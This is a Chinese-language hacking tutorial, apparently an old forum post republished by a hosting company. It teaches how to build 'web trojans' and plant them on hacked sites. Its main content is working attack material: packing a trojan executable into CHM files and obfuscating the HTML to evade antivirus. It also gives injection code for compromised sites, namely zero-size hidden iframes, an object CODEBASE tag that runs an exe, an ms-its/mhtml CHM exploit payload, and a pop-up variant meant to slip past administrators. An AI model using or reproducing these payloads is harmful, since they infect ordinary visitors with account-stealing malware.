网页木马制作小结

这是以前写的文章了..也是个很老的方法了...
当然做网页木马的方法并不止这几个...网上也有相应的教程和工具....没什么新意...只是给新手看的...老手现在能够直接跳过看别的文章了
希望台下的兄弟看了后表砸我....

其实做网页木马的方法还是很多滴~~网上也有相关教程。
最简单的也就是用ChmBuilder这个软件来制作chm木马了，首先我们要配置好一个木马服务端，我再这里就拿QQ杀手7.1版说下把。关于他的使用和配置我就不多说了把，下载了这软件都自带有帮助文档的，看几遍就会明白的了。然后生成服务端，假设我生成的木马服务端为mm.exe，接着打开ChmBuilder选择我们的mm
.exe 然后点生成，就会在相同目录下自动生成一个mm.chm和mm.htm (注意：这几个文档可不要轻易去点哦，万一出了什么后果，不要找偶~~~……^_^) 接着就把mm.chm和mm.htm传到自己的空间，假如没空间有肉鸡也是能够滴，建议最好用肉鸡，这样万一对方发现了也是您发现您肉鸡。但是有的空间还是比较严格的，在上传时会发现那个mm.htm并不存在，那就是被对方的杀毒软件查杀了把。 到了这里我们就需要另外一个软件了htmtool
网页加密程式，选择源文档为mm.htm目标文档m.htm然后点加密，程式就会在mm.htm目录下生成一个用Javascript加密后的m.htm，然后把m.htm传肉鸡或空间里去把。 我在本机测试。_blank>http://127.0.0.1/m.htm就是我们的网页木马地址了，只要把这个发给别人，对方浏览了就会中了我们的木马。 但是对方会相信您吗？现在的网民安全意识也稍微提高了点，对于您发来的站都不会轻易去点。 所以呢~~还是自己动手把。入侵~~~~挂马！嘿嘿~~对不起那些站长了。 相信大家也都知道这个名词把.....不知道的就....别找我哦。

一般在您入侵了一个站拿到了webshell的时候，有的人也就是改下主页来满足自己的虚荣心把。下面来说挂马把。最常见的 挂站代码如下 ：
<html>
<iframe src="http://127.0.0.1/m.htm" width="0" height="0" frameborder="0"></iframe>
</html>

把以上代码插到对方网页代码中，那么下次别人浏览了那个站点就会自动转向_blank>http://127.0.0.1/m.htm。而_blank>http://127.0.0.1/m.htm也就是我门的网页木马了，那width="0" height="0"又是什么意思呢？懂点英文的朋友也应该知道了把，width就是宽而height自然就是高了。我们把他配置为0也就是不显示了，对方也就看不见我们的这个页面，木马也就会被下载到本地。

但是感觉这个方法已过失了，现在的站长在发现自己的站被挂了木马后，假如主页代码过多，只要搜索iframe就能找到了我们的木马了，一个del，哈哈~~~~玩完了。

所以，下面再介绍几个把。

单独利用chm这个文档来达到盗号目的。假设我们的木马服务端还是为mm.exe然后在他相同目录下建一个mm.htm文档，代码如下
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="mm.exe"
</object>
当然您也能够把mm.exe和mm.htm换成是别的文档名。然后用QuickCHM这个软件来编译成为chm文档。（这些工具在google都能搜索到的）然后chm向导。选中*.*，项目文档夹就是刚才那两个mm.exe和mm.htm所在的目录了。
然后下一步，htm文档在上，exe文档在下，接着能够编译他了。
编辑成功后千万不要点“是”给运行了。那样自己就中了马了~~然后就会发现原来的2个文档已多出了四个
newproject.chm，newproject.hhc ，newproject.hhk ，newproject.hhp 其实最后三个是没用的，删了他把只留一个newproject.chm ，然后把他改任意名上传空间。

但这个挂马就不能用上面的那段代码了。假设我做好的chm木马为_blank>http://127.0.0.1/mm.chm

那就用以下代码

<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://c:foo.mht!_blank>

http://127.0.0.1/mm.chm::/test.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/ ${path}/g,location.href.substring(0,location.href.indexOf('index.asp'))));
</script>

请把路径换成您的chm木马地址，index.aso要换成对应的主页文档名，假如您要挂马的主页名是default.asp
那相应的index.asp也就要换成default.asp了。

但是好景不长啊，再好的东西也有坏的时候，就在一次挂马中在主页里添加了以上代码后，发现主页自动被删，FT~~~真是极度郁闷！后来经过我反思，又想到了一个方法，也提供给大家，就是找一个能上传的肉鸡，然后新建一个文档，假设为ceshi.htm 然后这个文档什么都不要加
在代码里写入
<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://c:foo.mht!_blank>http://127.0.0.1/mm.chm::/test.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/ ${path}/g,location.href.substring(0,location.href.indexOf('ceshi.htm'))));
</script>

最终得到我们的木马地址是_blank>http://www.xx.com/ceshi.htm（虚构的网站）

然后去挂我们的马把。可能大家一看到是htm的就想到用最上面我提到的了

<html>
<iframe src="http://www.xx.com/ceshi.htm" width="0" height="0" frameborder="0"></iframe>
</html>

但这个很不安全，看我是怎么做滴。嘻~~~

<SCRIPT language=javascript>
window.open("http://www.xx.com/ceshi.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>

学过java的都知道上面一段代码的意思了把！打开网站的同时也就打开了我们的_blank>http://www.xx.com/ceshi.htm
是不是比上面的那个隐蔽了些。假如粗心的管理员在搜索了iframe没结果后，放弃了检查这个页面，那您不是拣了大便宜了！

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!